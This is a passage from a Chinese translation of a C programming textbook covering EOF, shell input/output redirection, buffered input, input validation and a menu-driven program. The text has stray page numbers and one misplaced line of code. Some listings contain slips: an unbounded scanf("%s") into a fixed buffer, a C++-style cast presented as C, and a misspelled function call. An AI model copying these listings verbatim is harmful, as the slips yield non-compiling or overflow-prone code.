getchar()) != EOF) putchar(ch); return 0; } 注意下面几点。 不用定义EOF,因为stdio.h中已经定义过了。 不用担心EOF的实际值,因为EOF在stdio.h中用#define预处理指令定 义,可直接使用,不必再编写代码假定EOF为某值。 506 变量ch的类型从char变为int,因为char类型的变量只能表示0~255的无 符号整数,但是EOF的值是-1。还好,getchar()函数实际返回值的类型是 int,所以它可以读取EOF字符。如果实现使用有符号的char类型,也可以把 ch声明为char类型,但最好还是用更通用的形式。 由于getchar()函数的返回类型是int,如果把getchar()的返回值赋给char类 型的变量,一些编译器会警告可能丢失数据。 ch是整数不会影响putchar(),该函数仍然会打印等价的字符。 使用该程序进行键盘输入,要设法输入EOF字符。不能只输入字符 EOF,也不能只输入-1(输入-1会传送两个字符:一个连字符和一个数字 1)。正确的方法是,必须找出当前系统的要求。例如,在大多数UNIX和 Linux系统中,在一行开始处按下Ctrl+D会传输文件结尾信号。许多微型计算 机系统都把一行开始处的Ctrl+Z识别为文件结尾信号,一些系统把任意位置 的Ctrl+Z解释成文件结尾信号。 下面是在UNIX系统下运行echo_eof.c程序的缓冲示例: She walks in beauty, like the night She walks in beauty, like the night Of cloudless climes and starry skies... Of cloudless climes and starry skies... Lord Byron Lord Byron [Ctrl+D] 每次按下Enter键,系统便会处理缓冲区中储存的字符,并在下一行打 印该输入行的副本。这个过程一直持续到以UNIX风格模拟文件结尾(按下 507 Ctrl+D)。在PC中,要按下Ctrl+Z。 我们暂停一会。既然echo_eof.c程序能把用户输入的内容拷贝到屏幕 上,那么考虑一下该程序还可以做什么。假设以某种方式把一个文件传送给 它,然后它把文件中的内容打印在屏幕上,当到达文件结尾发现EOF信号时 停止。或者,假设以某种方式把程序的输出定向到一个文件,然后通过键盘 输入数据,用echo_eof.c 来储存在文件中输入的内容。假设同时使用这两种 方法:把输入从一个文件定向到echo_eof.c中,并把输出发送至另一个文 件,然后便可以使用echo_eof.c来拷贝文件。这个小程序有查看文件内容、 创建一个新文件、拷贝文件的潜力,没想到一个小程序竟然如此多才多艺! 关键是要控制输入流和输出流,这是我们下一个要讨论的主题。 注意 模拟EOF和图形界面 模拟EOF的概念是在使用文本界面的命令行环境中产生的。在这种环境 中,用户通过击键与程序交互,由操作系统生成EOF信号。但是在一些实际 应用中,却不能很好地转换成图形界面(如Windows和Macintosh),这些用 户界面包含更复杂的鼠标移动和按钮点击。程序要模拟EOF的行为依赖于编 译器和项目类型。例如,Ctrl+Z可以结束输入或整个程序,这取决于特定的 设置。 508 8.4 重定向和文件 输入和输出涉及函数、数据和设备。例如,考虑 echo_eof.c,该程序使 用输入函数 getchar()。输出设备(我们假设)是键盘,输入数据流由字符组 成。假设你希望输入函数和数据类型不变,仅改变程序查找数据的位置。那 么,程序如何知道去哪里查找输入? 
在默认情况下,C程序使用标准I/O包查找标准输入作为输入源。这就是 前面介绍过的stdin流,它是把数据读入计算机的常用方式。它可以是一个过 时的设备,如磁带、穿孔卡或电传打印机,或者(假设)是键盘,甚至是一 些先进技术,如语音输入。然而,现代计算机非常灵活,可以让它到别处查 找输入。尤其是,可以让一个程序从文件中查找输入,而不是从键盘。 程序可以通过两种方式使用文件。第 1 种方法是,显式使用特定的函数 打开文件、关闭文件、读取文件、写入文件,诸如此类。我们在第13章中再 详细介绍这种方法。第2种方法是,设计能与键盘和屏幕互动的程序,通过 不同的渠道重定向输入至文件和从文件输出。换言之,把stdin流重新赋给文 件。继续使用getchar()函数从输入流中获取数据,但它并不关心从流的什么 位置获取数据。虽然这种重定向的方法在某些方面有些限制,但是用起来比 较简单,而且能让读者熟悉普通的文件处理技术。 重定向的一个主要问题与操作系统有关,与C无关。尽管如此,许多C 环境中(包括UNIX、Linux和Windows命令提示模式)都有重定向特性,而 且一些C实现还在某些缺乏重定向特性的系统中模拟它。在UNIX上运行苹果 OS X,可以用UNIX命令行模式启动Terminal应用程序。接下来我们介绍 UNIX、Linux和Windows的重定向。 8.4.1 UNIX、Linux和DOS重定向 UNIX(运行命令行模式时)、Linux(ditto)和Window命令行提示(模 仿旧式DOS命令行环境)都能重定向输入、输出。重定向输入让程序使用文 件而不是键盘来输入,重定向输出让程序输出至文件而不是屏幕。 509 1.重定向输入 假设已经编译了echo_eof.c 程序,并把可执行版本放入一个名为 echo_eof(或者在Windows系统中名为echo_eof.exe)的文件中。运行该程 序,输入可执行文件名: echo_eof 该程序的运行情况和前面描述的一样,获取用户从键盘输入的输入。现 在,假设你要用该程序处理名为words的文本文件。文本文件(text file)是 内含文本的文件,其中储存的数据是我们可识别的字符。文件的内容可以是 一篇散文或者C程序。内含机器语言指令的文件(如储存可执行程序的文 件)不是文本文件。由于该程序的操作对象是字符,所以要使用文本文件。 只需用下面的命令代替上面的命令即可: echo_eof < words <符号是UNIX和DOS/Windows的重定向运算符。该运算符使words文件 与stdin流相关联,把文件中的内容导入echo_eof程序。echo_eof程序本身并 不知道(或不关心)输入的内容是来自文件还是键盘,它只知道这是需要导 入的字符流,所以它读取这些内容并把字符逐个打印在屏幕上,直至读到文 件结尾。因为C把文件和I/O设备放在一个层面,所以文件就是现在的I/O设 备。试试看! 注意 重定向 对于UNIX、Linux和Windows命令提示,<两侧的空格是可选的。一些系 统,如AmigaDOS(那些喜欢怀旧的人使用的系统),支持重定向,但是在 重定向符号和文件名之间不允许有空格。 下面是一个特殊的words文件的运行示例,$是UNIX和Linux的标准提示 符。在Windows/DOS系统中见到的DOS提示可能是A>或C>。 $ echo_eof < words 510 The world is too much with us: late and soon, Getting and spending, we lay waste our powers: Little we see in Nature that is ours; We have given our hearts away, a sordid boon! $ 2.重定向输出 现在假设要用echo_eof把键盘输入的内容发送到名为mywords的文件 中。然后,输入以下命令并开始输入: echo_eof>mywords >符号是第2个重定向运算符。它创建了一个名为mywords的新文件,然 后把echo_eof的输出(即,你输入字符的副本)重定向至该文件中。重定向 把stdout从显示设备(即,显示器)赋给mywords文件。如果已经有一个名为 mywords的文件,通常会擦除该文件的内容,然后替换新的内容(但是,许 多操作系统有保护现有文件的选项,使其成为只读文件)。所有出现在屏幕 的字母都是你刚才输入的,其副本储存在文件中。在下一行的开始处按下 Ctrl+D(UNIX)或Ctrl+Z(DOS)即可结束该程序。如果不知道输入什么内 容,可参照下面的示例。这里,我们使用UNIX提示符$。记住在每行的末尾 单击Enter键,这样才能把缓冲区的内容发送给程序。 $ echo_eof > mywords You should have no problem recalling which redirection operator does what. Just remember that each operator  points in the direction the information flows. Think of it as 511 a funnel. [Ctrl+D] $ 按下Ctrl+D或Ctrl+Z后,程序会结束,你的系统会提示返回。程序是否 起作用了?UNIX的ls命令或Windows命令行提示模式的dir命令可以列出文件 名,会显示mywords文件已存在。可以使用UNIX或Linux的cat或DOS的type命 令检查文件中的内容,或者再次使用echo_eof,这次把文件重定向到程序: $ echo_eof < mywords You should have no problem recalling which redirection operator does what. Just remember that each operator points in the direction the information flows. Think of it as a funnel. 
$ 3.组合重定向 现在,假设你希望制作一份mywords文件的副本,并命名为savewords。 只需输入以下命令即可: echo_eof < mywords > savewords 下面的命令也起作用,因为命令与重定向运算符的顺序无关: echo_eof > savewords < mywords 注意:在一条命令中,输入文件名和输出文件名不能相同。 512 echo_eof < mywords > mywords....<--错误 原因是> mywords在输入之前已导致原mywords的长度被截断为0。 总之,在UNIX、Linux或Windows/DOS系统中使用两个重定向运算符 (<和>)时,要遵循以下原则。 重定向运算符连接一个可执行程序(包括标准操作系统命令)和一个数 据文件,不能用于连接一个数据文件和另一个数据文件,也不能用于连接一 个程序和另一个程序。 使用重定向运算符不能读取多个文件的输入,也不能把输出定向至多个 文件。 通常,文件名和运算符之间的空格不是必须的,除非是偶尔在UNIX shell、Linux shell或Windows命令行提示模式中使用的有特殊含义的字符。例 如,我们用过的echo_eof<words。 以上介绍的都是正确的例子,下面来看一下错误的例子,addup和count 是两个可执行程序,fish和beets是两个文本文件: fish > beets        ←违反第1条规则 addup < count        ←违反第1条规则 addup < fish < beets    ←违反第2条规则 count > beets fish     ←违反第2条规则 UNIX、Linux或Windows/DOS 还有>>运算符,该运算符可以把数据添加 到现有文件的末尾,而 | 运算符能把一个文件的输出连接到另一个文件的输 入。欲了解所有相关运算符的内容,请参阅 UNIX 的相关书籍,如UNIX Primer Plus,Third Edition(Wilson、Pierce和Wessler合著)。 4.注释 513 重定位让你能使用键盘输入程序文件。要完成这一任务,程序要测试文 件的末尾。例如,第 7 章演示的统计单词程序(程序清单7.7),计算单词 个数直至遇到第1个|字符。把ch的char类型改成int类型,把循环测试中的|替 换成EOF,便可用该程序来计算文本文件中的单词量。 重定向是一个命令行概念,因为我们要在命令行输入特殊的符号发出指 令。如果不使用命令行环境,也可以使用重定向。首先,一些集成开发环境 提供了菜单选项,让用户指定重定向。其次,对于 Windows系统,可以打开 命令提示窗口,并在命令行运行可执行文件。Microsoft Visual Studio的默认 设置是把可执行文件放在项目文件夹的子文件夹,称为Debug。文件名和项 目名的基本名相同,文件名的扩展名为.exe。默认情况下,Xcode在给项目 命名后才能命名可执行文件,并将其放在Debug文件夹中。在UNIX系统中, 可以通过Terminal工具运行可执行文件。从使用上看,Terminal比命令行编译 器(GCC或Clang)简单。 如果用不了重定向,可以用程序直接打开文件。程序清单8.3演示了一 个注释较少的示例。我们学到第13章时再详细讲解。待读取的文件应该与可 执行文件位于同一目录。 程序清单8.3 file_eof.c程序 // file_eof.c --打开一个文件并显示该文件 #include <stdio.h> #include <stdlib.h>       // 为了使用exit() int main() { int ch; FILE * fp; 514 char fname[50];       // 储存文件名 printf("Enter the name of the file: "); scanf("%s", fname); fp = fopen(fname, "r");   // 打开待读取文件 if (fp == NULL)       // 如果失败 { printf("Failed to open file. Bye\n"); exit(1);         // 退出程序 } // getc(fp)从打开的文件中获取一个字符 while ((ch = getc(fp)) != EOF) putchar(ch); fclose(fp);          // 关闭文件 return 0; } 小结:如何重定向输入和输出 绝大部分C系统都可以使用重定向,可以通过操作系统重定向所有程 序,或只在C编译器允许的情况下重定向C程序。假设prog是可执行程序 名,file1和file2是文件名。 把输出重定向至文件:> 515 prog >file1 把输入重定向至文件:< prog <file2 组合重定向: prog <file2 >file1 prog >file1 <file2 这两种形式都是把file2作为输入、file1作为输出。 留白: 一些系统要求重定向运算符左侧有一个空格,右侧没有空格。而其他系 统(如,UNIX)允许在重定位运算符两侧有空格或没有空格。 516 8.5 创建更友好的用户界面 大部分人偶尔会写一些中看不中用的程序。还好,C提供了大量工具让 输入更顺畅,处理过程更顺利。不过,学习这些工具会导致新的问题。本节 的目标是,指导读者解决这些问题并创建更友好的用户界面,让交互数据输 入更方便,减少错误输入的影响。 8.5.1 使用缓冲输入 缓冲输入用起来比较方便,因为在把输入发送给程序之前,用户可以编 辑输入。但是,在使用输入的字符时,它也会给程序员带来麻烦。前面示例 中看到的问题是,缓冲输入要求用户按下Enter键发送输入。这一动作也传 送了换行符,程序必须妥善处理这个麻烦的换行符。我们以一个猜谜程序为 例。用户选择一个数字,程序猜用户选中的数字是多少。该程序使用的方法 单调乏味,先不要在意算法,我们关注的重点在输入和输出。查看程序清单 8.4,这是猜谜程序的最初版本,后面我们会改进。 程序清单8.4 guess.c程序 /* guess.c -- 一个拖沓且错误的猜数字程序 */ #include <stdio.h> int main(void) { int guess = 1; printf("Pick an integer from 1 to 100. I will try to  guess "); printf("it.\nRespond with a y if my guess is right and  with"); 517 printf("\nan n if it is wrong.\n"); printf("Uh...is your number %d?\n", guess); while (getchar() != 'y')   /* 获取响应,与 y 做对比 */ printf("Well, then, is it %d?\n", ++guess); printf("I knew I could do it!\n"); return 0; } 下面是程序的运行示例: Pick an integer from 1 to 100. I will try to guess it. Respond with a y if my guess is right and with an n if it is wrong. Uh...is your number 1? n Well, then, is it 2? Well, then, is it 3? n Well, then, is it 4? Well, then, is it 5? y 518 I knew I could do it! 
撇开这个程序糟糕的算法不谈,我们先选择一个数字。注意,每次输入 n 时,程序打印了两条消息。这是由于程序读取n作为用户否定了数字1,然 后还读取了一个换行符作为用户否定了数字2。 一种解决方案是,使用while循环丢弃输入行最后剩余的内容,包括换 行符。这种方法的优点是,能把no和no way这样的响应视为简单的n。程序 清单8.4的版本会把no当作两个响应。下面用循环修正 char response;这个问题: while (getchar() != 'y')  /* 获取响应,与 y 做对比*/ { printf("Well, then, is it %d?\n", ++guess); while (getchar() != '\n') continue;     /* 跳过剩余的输入行 */ } 使用以上循环后,该程序的输出示例如下: Pick an integer from 1 to 100. I will try to guess it. Respond with a y if my guess is right and with an n if it is wrong. Uh...is your number 1? n 519 Well, then, is it 2? no Well, then, is it 3? no sir Well, then, is it 4? forget it Well, then, is it 5? y I knew I could do it! 这的确是解决了换行符的问题。但是,该程序还是会把f被视为n。我们 用if语句筛选其他响应。首先,添加一个char类型的变量储存响应: 修改后的循环如下: while ((response = getchar()) != 'y') /* 获取响应 */ { if (response == 'n') printf("Well, then, is it %d?\n", ++guess); else printf("Sorry, I understand only y or n.\n"); while (getchar() != '\n') 520 continue; /* 跳过剩余的输入行 */ } 现在,程序的运行示例如下: Pick an integer from 1 to 100. I will try to guess it. Respond with a y if my guess is right and with an n if it is wrong. Uh...is your number 1? n Well, then, is it 2? no Well, then, is it 3? no sir Well, then, is it 4? forget it Sorry, I understand only y or n. n Well, then, is it 5? y I knew I could do it! 521 在编写交互式程序时,应该事先预料到用户可能会输入错误,然后设计 程序处理用户的错误输入。在用户出错时通知用户再次输入。 当然,无论你的提示写得多么清楚,总会有人误解,然后抱怨这个程序 设计得多么糟糕。 8.5.2 混合数值和字符输入 假设程序要求用 getchar()处理字符输入,用 scanf()处理数值输入,这两 个函数都能很好地完成任务,但是不能把它们混用。因为 getchar()读取每个 字符,包括空格、制表符和换行符;而 scanf()在读取数字时则会跳过空格、 制表符和换行符。 我们通过程序清单8.5来解释这种情况导致的问题。该程序读入一个字 符和两个数字,然后根据输入的两个数字指定的行数和列数打印该字符。 程序清单8.5 showchar1.c程序 /* showchar1.c -- 有较大 I/O 问题的程序 */ #include <stdio.h> void display(char cr, int lines, int width); int main(void) { int ch;        /* 待打印字符  */ int rows, cols;    /* 行数和列数 */ printf("Enter a character and two integers:\n"); while ((ch = getchar()) != '\n') 522 { scanf("%d %d", &rows, &cols); display(ch, rows, cols); printf("Enter another character and two integers;\n"); printf("Enter a newline to quit.\n"); } printf("Bye.\n"); return 0; } void display(char cr, int lines, int width) { int row, col; for (row = 1; row <= lines; row++) { for (col = 1; col <= width; col++) putchar(cr); putchar('\n');/* 结束一行并开始新的一行 */ } } 523 注意,该程序以 int 类型读取字符(这样做可以检测 EOF),但是却以 char 类型把字符传递给display()函数。因为char比int小,一些编译器会给出 类型转换的警告。可以忽略这些警告,或者用下面的强制类型转换消除警 告: display(char(ch), rows, cols); 在该程序中,main()负责获取数据,display()函数负责打印数据。下面 是该程序的一个运行示例,看看有什么问题: Enter a character and two integers: c 2 3 ccc ccc Enter another character and two integers; Enter a newline to quit. Bye. 
该程序开始时运行良好。你输入c 2 3,程序打印c字符2行3列。然后, 程序提示输入第2组数据,还没等你输入数据程序就退出了!这是什么情 况?又是换行符在捣乱,这次是输入行中紧跟在 3 后面的换行符。scanf()函 数把这个换行符留在输入队列中。和 scanf()不同,getchar()不会跳过换行 符,所以在进入下一轮迭代时,你还没来得及输入字符,它就读取了换行 符,然后将其赋给ch。而ch是换行符正式终止循环的条件。 要解决这个问题,程序要跳过一轮输入结束与下一轮输入开始之间的所 有换行符或空格。另外,如果该程序不在getchar()测试时,而在scanf()阶段 终止程序会更好。修改后的版本如程序清单8.6所示。 524 程序清单8.6 showchar2.c程序 /* showchar2.c -- 按指定的行列打印字符 */ #include <stdio.h> void display(char cr, int lines, int width); int main(void) { int ch;        /* 待打印字符*/ int rows, cols;    /* 行数和列数 */ printf("Enter a character and two integers:\n"); while ((ch = getchar()) != '\n') { if (scanf("%d %d", &rows, &cols) != 2) break; display(ch, rows, cols); while (getchar() != '\n') continue; printf("Enter another character and two integers;\n"); printf("Enter a newline to quit.\n"); } 525 printf("Bye.\n"); return 0; } void display(char cr, int lines, int width) { int row, col; for (row = 1; row <= lines; row++) { for (col = 1; col <= width; col++) putchar(cr); putchar('\n');  /* 结束一行并开始新的一行 */ } } while循环实现了丢弃scanf()输入后面所有字符(包括换行符)的功能, 为循环的下一轮读取做好了准备。该程序的运行示例如下: Enter a character and two integers: c 1 2 cc Enter another character and two integers; 526 Enter a newline to quit. ! 3 6 !!!!!! !!!!!! !!!!!! Enter another character and two integers; Enter a newline to quit. Bye. 在if语句中使用一个break语句,可以在scanf()的返回值不等于2时终止 程序,即如果一个或两个输入值不是整数或者遇到文件结尾就终止程序。 527 8.6 输入验证 在实际应用中,用户不一定会按照程序的指令行事。用户的输入和程序 期望的输入不匹配时常发生,这会导致程序运行失败。作为程序员,除了完 成编程的本职工作,还要事先预料一些可能的输入错误,这样才能编写出能 检测并处理这些问题的程序。 例如,假设你编写了一个处理非负数整数的循环,但是用户很可能输入 一个负数。你可以使用关系表达式来排除这种情况: long n; scanf("%ld", &n);   // 获取第1个值 while (n >= 0)     // 检测不在范围内的值 { // 处理n scanf("%ld", &n); // 获取下一个值 } 另一类潜在的陷阱是,用户可能输入错误类型的值,如字符 q。排除这 种情况的一种方法是,检查scanf()的返回值。回忆一下,scanf()返回成功读 取项的个数。因此,下面的表达式当且仅当用户输入一个整数时才为真: scanf("%ld", &n) == 1 结合上面的while循环,可改进为: long n; while (scanf("%ld", &n) == 1 && n >= 0) 528 { //处理n } while循环条件可以描述为“当输入是一个整数且该整数为正时”。 对于最后的例子,当用户输入错误类型的值时,程序结束。然而,也可 以让程序友好些,提示用户再次输入正确类型的值。在这种情况下,要处理 有问题的输入。如果scanf()没有成功读取,就会将其留在输入队列中。这里 要明确,输入实际上是字符流。可以使用getchar()函数逐字符地读取输入, 甚至可以把这些想法都结合在一个函数中,如下所示: long get_long(void) { long input; char ch; while (scanf("%ld", &input) != 1) { while ((ch = getchar()) != '\n') putchar(ch); // 处理错误的输入 printf(" is not an integer.\nPlease enter an "); printf("integer value, such as 25, -178, or 3: "); } 529 return input; } 该函数要把一个int类型的值读入变量input中。如果读取失败,函数则进 入外层while循环体。然后内层循环逐字符地读取错误的输入。注意,该函 数丢弃该输入行的所有剩余内容。还有一个方法是,只丢弃下一个字符或单 词,然后该函数提示用户再次输入。外层循环重复运行,直到用户成功输入 整数,此时scanf()的返回值为1。 在用户输入整数后,程序可以检查该值是否有效。考虑一个例子,要求 用户输入一个上限和一个下限来定义值的范围。在该例中,你可能希望程序 检查第1个值是否大于第2个值(通常假设第1个值是较小的那个值),除此 之外还要检查这些值是否在允许的范围内。例如,当前的档案查找一般不会 接受 1958 年以前和2014年以后的查询任务。这个限制可以在一个函数中实 现。 假设程序中包含了stdbool.h 头文件。如果当前系统不允许使用_Bool, 把bool替换成int,把true 替换成 1,把 false 替换成 0 即可。注意,如果输入 无效,该函数返回 true,所以函数名为bad_limits(): bool bad_limits(long begin, long end,long low, long high) { bool not_good = false; if (begin > end) { printf("%ld isn't smaller than %ld.\n", begin, end); not_good = true; 530 } if (begin < low || end < low) { printf("Values must be %ld or greater.\n", low); not_good = true; } if (begin > high || end > high) { printf("Values must be %ld or less.\n", high); not_good = true; } return not_good; } 程序清单8.7使用了上面的两个函数为一个进行算术运算的函数提供整 数,该函数计算特定范围内所有整数的平方和。程序限制了范围的上限是 10000000,下限是-10000000。 程序清单8.7 checking.c程序 // checking.c -- 输入验证 #include <stdio.h> #include <stdbool.h> 531 // 验证输入是一个整数 long get_long(void); // 验证范围的上下限是否有效 bool bad_limits(long begin, long end, long low, long high); // 计算a~b之间的整数平方和 double sum_squares(long a, long b); int main(void) { const long 
MIN = -10000000L;  // 范围的下限 const long MAX = +10000000L;  // 范围的上限 long start;            // 用户指定的范围最小值 long stop;             // 用户指定的范围最大值 double answer; printf("This program computes the sum of the squares of " "integers in a range.\nThe lower bound should not " "be less than -10000000 and\nthe upper bound " "should not be more than +10000000.\nEnter the " "limits (enter 0 for both limits to quit):\n" 532 "lower limit: "); start = get_long(); printf("upper limit: "); stop = get_long(); while (start != 0 || stop != 0) { if (bad_limits(start, stop, MIN, MAX)) printf("Please try again.\n"); else { answer = sum_squares(start, stop); printf("The sum of the squares of the integers "); printf("from %ld to %ld is %g\n", start, stop, answer); } printf("Enter the limits (enter 0 for both " "limits to quit):\n"); printf("lower limit: "); start = get_long(); 533 printf("upper limit: "); stop = get_long(); } printf("Done.\n"); return 0; } long get_long(void) { long input; char ch; while (scanf("%ld", &input) != 1) { while ((ch = getchar()) != '\n') putchar(ch);       // 处理错误输入 printf(" is not an integer.\nPlease enter an "); printf("integer value, such as 25, -178, or 3: "); } return input; } 534 double sum_squares(long a, long b) { double total = 0; long i; for (i = a; i <= b; i++) total += (double) i * (double) i; return total; } bool bad_limits(long begin, long end, long low, long high) { bool not_good = false; if (begin > end) { printf("%ld isn't smaller than %ld.\n", begin, end); not_good = true; } if (begin < low || end < low) { 535 printf("Values must be %ld or greater.\n", low); not_good = true; } if (begin > high || end > high) { printf("Values must be %ld or less.\n", high); not_good = true; } return not_good; } 下面是该程序的输出示例: This program computes the sum of the squares of integers  in a range. The lower bound should not be less than -10000000 and the upper bound should not be more than +10000000. Enter the limits (enter 0 for both limits to quit): lower limit: low low is not an integer. Please enter an integer value, such as 25, -178, or 3: 3 536 upper limit: a big number a big number is not an integer. Please enter an integer value, such as 25, -178, or 3: 12 The sum of the squares of the integers from 3 to 12 is  645 Enter the limits (enter 0 for both limits to quit): lower limit: 80 upper limit: 10 80 isn't smaller than 10. Please try again. Enter the limits (enter 0 for both limits to quit): lower limit: 0 upper limit: 0 Done. 
8.6.1 分析程序 虽然checking.c程序的核心计算部分(sum_squares()函数)很短,但是输 入验证部分比以往程序示例要复杂。接下来分析其中的一些要素,先着重讨 论程序的整体结构。 程序遵循模块化的编程思想,使用独立函数(模块)来验证输入和管理 显示。程序越大,使用模块化编程就越重要。 537 main()函数管理程序流,为其他函数委派任务。它使用 get_long()获取 值、while 循环处理值、badlimits()函数检查值是否有效、sum_squres()函数 处理实际的计算: start = get_long(); printf("upper limit: "); stop = get_long(); while (start != 0 || stop != 0) { if (bad_limits(start, stop, MIN, MAX)) printf("Please try again.\n"); else { answer = sum_squares(start, stop); printf("The sum of the squares of the integers "); printf("from %ld to %ld is %g\n", start, stop, answer); } printf("Enter the limits (enter 0 for both " "limits to quit):\n"); printf("lower limit: "); start = get_long(); 538 printf("upper limit: "); stop = get_long(); } 8.6.2 输入流和数字 在编写处理错误输入的代码时(如程序清单8.7),应该很清楚C是如何 处理输入的。考虑下面的输入: is 28 12.4 在我们眼中,这就像是一个由字符、整数和浮点数组成的字符串。但是 对 C程序而言,这是一个字节流。第1个字节是字母i的字符编码,第2个字 节是字母s的字符编码,第3个字节是空格字符的字符编码,第4个字节是数 字2的字符编码,等等。所以,如果get_long()函数处理这一行输入,第1个 字符是非数字,那么整行输入都会被丢弃,包括其中的数字,因为这些数字 只是该输入行中的其他字符: while ((ch = getchar()) != '\n') putchar(ch); // 处理错误的输入 虽然输入流由字符组成,但是也可以设置scanf()函数把它们转换成数 值。例如,考虑下面的输入: 42 如果在scanf()函数中使用%c转换说明,它只会读取字符4并将其储存在 char类型的变量中。如果使用%s转换说明,它会读取字符4和字符2这两个字 符,并将其储存在字符数组中。如果使用%d转换说明,scanf()同样会读取 两个字符,但是随后会计算出它们对应的整数值:4×10+2,即42,然后将 表示该整数的二进制数储存在 int 类型的变量中。如果使用%f 转换说明, 539 scanf()也会读取两个字符,计算出它们对应的数值42.0,用内部的浮点表示 法表示该值,并将结果储存在float类型的变量中。 简而言之,输入由字符组成,但是scanf()可以把输入转换成整数值或浮 点数值。使用转换说明(如%d或%f)限制了可接受输入的字符类型,而 getchar()和使用%c的scanf()接受所有的字符。 540 8.7 菜单浏览 许多计算机程序都把菜单作为用户界面的一部分。菜单给用户提供方便 的同时,却给程序员带来了一些麻烦。我们看看其中涉及了哪些问题。 菜单给用户提供了一份响应程序的选项。假设有下面一个例子: Enter the letter of your choice: a. advice       b. bell c. count        q. quit 理想状态是,用户输入程序所列选项之一,然后程序根据用户所选项完 成任务。作为一名程序员,自然希望这一过程能顺利进行。因此,第1个目 标是:当用户遵循指令时程序顺利运行;第2个目标是:当用户没有遵循指 令时,程序也能顺利运行。显而易见,要实现第 2 个目标难度较大,因为很 难预料用户在使用程序时的所有错误情况。 现在的应用程序通常使用图形界面,可以点击按钮、查看对话框、触摸 图标,而不是我们示例中的命令行模式。但是,两者的处理过程大致相同: 给用户提供选项、检查并执行用户的响应、保护程序不受误操作的影响。除 了界面不同,它们底层的程序结构也几乎相同。但是,使用图形界面更容易 通过限制选项控制输入。 8.7.1 任务 我们来更具体地分析一个菜单程序需要执行哪些任务。它要获取用户的 响应,根据响应选择要执行的动作。另外,程序应该提供返回菜单的选项。 C 的 switch 语句是根据选项决定行为的好工具,用户的每个选择都可以对应 一个特定的case标签。使用while语句可以实现重复访问菜单的功能。因此, 我们写出以下伪代码: 获取选项 541 当选项不是'q'时 转至相应的选项并执行 获取下一个选项 8.7.2 使执行更顺利 当你决定实现这个程序时,就要开始考虑如何让程序顺利运行(顺利运 行指的是,处理正确输入和错误输入时都能顺利运行)。例如,你能做的是 让“获取选项”部分的代码筛选掉不合适的响应,只把正确的响应传入 switch。这表明需要为输入过程提供一个只返回正确响应的函数。结合while 循环和switch语句,其程序结构如下: #include <stdio.h> char get_choice(void); void count(void); int main(void) { int choice; while ((choice = get_choice()) != 'q') { switch (choice) { case 'a': printf("Buy low, sell high.\n"); 542 break; case 'b': putchar('\a'); /* ANSI */ break; case 'c': count(); break; default:  printf("Program error!\n"); break; } } return 0; } 定义get_choice()函数只能返回'a'、'b'、'c'和'q'。get_choice()的用法和 getchar()相同,两个函数都是获取一个值,并与终止值(该例中是'q')作比 较。我们尽量简化实际的菜单选项,以便读者把注意力集中在程序结构上。 稍后再讨论 count()函数。default 语句可以方便调试。如果get_choice()函数没 能把返回值限制为菜单指定的几个选项值,default语句有助于发现问题所 在。 get_choice()函数 下面的伪代码是设计这个函数的一种方案: 显示选项 获取用户的响应 543 当响应不合适时 提示用户再次输入 获取用户的响应 下面是一个简单而笨拙的实现: char get_choice(void) { int ch; printf("Enter the letter of your choice:\n"); printf("a. advice        b. bell\n"); printf("c. count         q. 
quit\n"); ch = getchar(); while ((ch < 'a' || ch > 'c') && ch != 'q') { printf("Please respond with a, b, c, or q.\n"); ch = getchar(); } return ch; } 缓冲输入依旧带来些麻烦,程序把用户每次按下 Return 键产生的换行 544 符视为错误响应。为了让程序的界面更流畅,该函数应该跳过这些换行符。 这类问题有多种解决方案。一种是用名为get_first()的新函数替换 getchar()函数,读取一行的第1个字符并丢弃剩余的字符。这种方法的优点 是,把类似act这样的输入视为简单的a,而不是继续把act中的c作为选项c的 一个有效的响应。我们重写输入函数如下: char get_choice(void) { int ch; printf("Enter the letter of your choice:\n"); printf("a. advice         b. bell\n"); printf("c. count          q. quit\n"); ch = get_first(); while ((ch < 'a' || ch > 'c') && ch != 'q') { printf("Please respond with a, b, c, or q.\n"); ch = getfirst(); } return ch; } char get_first(void) 545 { int ch; ch = getchar();  /* 读取下一个字符 */ while (getchar() != '\n') continue; /* 跳过该行剩下的内容 */ return ch; } 8.7.3 混合字符和数值输入 前面分析过混合字符和数值输入会产生一些问题,创建菜单也有这样的 问题。例如,假设count()函数(选择c)的代码如下: void count(void) { int n, i; printf("Count how far? Enter an integer:\n"); scanf("%d", &n); for (i = 1; i <= n; i++) printf("%d\n", i); } 如果输入3作为响应,scanf()会读取3并把换行符留在输入队列中。下次 调用 get_choice()将导致get_first()返回这个换行符,从而导致我们不希望出 546 现的行为。 重写 get_first(),使其返回下一个非空白字符而不仅仅是下一个字符, 即可修复这个问题。我们把这个任务留给读者作为练习。另一种方法是,在 count()函数中清理换行符,如下所示: void count(void) { int n, i; printf("Count how far? Enter an integer:\n"); n = get_int(); for (i = 1; i <= n; i++) printf("%d\n", i); while (getchar() != '\n') continue; } 该函数借鉴了程序清单8.7中的get_long()函数,将其改为get_int()获取int 类型的数据而不是long类型的数据。回忆一下,原来的get_long()函数如何检 查有效输入和让用户重新输入。程序清单8.8演示了菜单程序的最终版本。 程序清单8.8 menuette.c程序 /* menuette.c -- 菜单程序 */ #include <stdio.h> 547 char get_choice(void); char get_first(void); int get_int(void); void count(void); int main(void) { int choice; void count(void); while ((choice = get_choice()) != 'q') { switch (choice) { case 'a':  printf("Buy low, sell high.\n"); break; case 'b': putchar('\a');  /* ANSI */ break; case 'c':  count(); break; default:  printf("Program error!\n"); 548 break; } } printf("Bye.\n"); return 0; } void count(void) { int n, i; printf("Count how far? Enter an integer:\n"); n = get_int(); for (i = 1; i <= n; i++) printf("%d\n", i); while (getchar() != '\n') continue; } char get_choice(void) { int ch; 549 printf("Enter the letter of your choice:\n"); printf("a. advice       b. bell\n"); printf("c. count        q. quit\n"); ch = get_first(); while ((ch < 'a' || ch > 'c') && ch != 'q') { printf("Please respond with a, b, c, or q.\n"); ch = get_first(); } return ch; } char get_first(void) { int ch; ch = getchar(); while (getchar() != '\n') continue; return ch; } 550 int get_int(void) { int input; char ch; while (scanf("%d", &input) != 1) { while ((ch = getchar()) != '\n') putchar(ch); // 处理错误输出 printf(" is not an integer.\nPlease enter an "); printf("integer value, such as 25, -178, or 3: "); } return input; } 下面是该程序的一个运行示例: Enter the letter of your choice: a. advice         b. bell c. count         q. quit a Buy low, sell high. 551 Enter the letter of your choice: a. advice         b. bell c. count         q. quit count Count how far? Enter an integer: two two is not an integer. Please enter an integer value, such as 25, -178, or 3: 5 1 2 3 4 5 Enter the letter of your choice: a. advice         b. bell c. count         q. quit d Please respond with a, b, c, or q. 
